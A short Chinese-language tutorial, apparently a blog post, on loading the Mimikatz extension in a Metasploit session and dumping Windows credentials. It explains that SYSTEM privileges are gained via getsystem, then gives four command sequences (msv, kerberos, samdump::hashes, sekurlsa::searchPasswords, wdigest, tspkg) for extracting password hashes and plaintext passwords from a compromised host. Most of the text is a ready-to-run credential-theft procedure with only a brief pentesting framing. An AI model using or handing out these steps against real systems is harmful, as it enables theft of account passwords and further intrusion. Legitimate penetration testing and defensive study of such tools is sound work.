工具简介

Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。

常用命令

kerberos:kerberos相关的模块

livessp:尝试检索livessp凭据

mimikatz_command:运行一个定制的命令

msv:msv凭证相关的模块,列出目标主机的用户密码哈希

ssp:ssp凭证相关的模块

tspkg:tspkg凭证相关的模块

wdigest:wdigest凭证相关的模块

注:

使用 mimikatz 模块需要System权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。

提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。

使用教程


加载mimikatz模块
load mimikatz


第一种方法:
获取登录密码的hash值
msv

上面已经是得到hash值了. 下面算明文密码.
获取明文密码 
kerberos
look...拿到登录的明文密码了.

第二种方法:

使用另一种方式获取哈希值

mimikatz_command -f samdump::hashes



根据上面的方式获取明文密码

mimikatz_command -f sekurlsa::searchPasswords



第三种方法:

使用Wdigest命令

这个命令呢, 没有上面的复杂,加载模块后直接调用这个wdigest.

wdigest



第四种方法:
使用tspkg命令

tspkg



总结

一、

load mimikatz #加载mimikatz

msv #获取hash值

kerberos #获取明文

二、

load mimikatz #加载mimikatz

mimikatz_command -f samdump::hashes

mimikatz_command -f sekurlsa::searchPasswords

三、

load mimikatz #加载mimikatz

wdigest #获取系统账户信息

四、

load mimikatz #加载mimikatz

tspkg #获取系统账户信息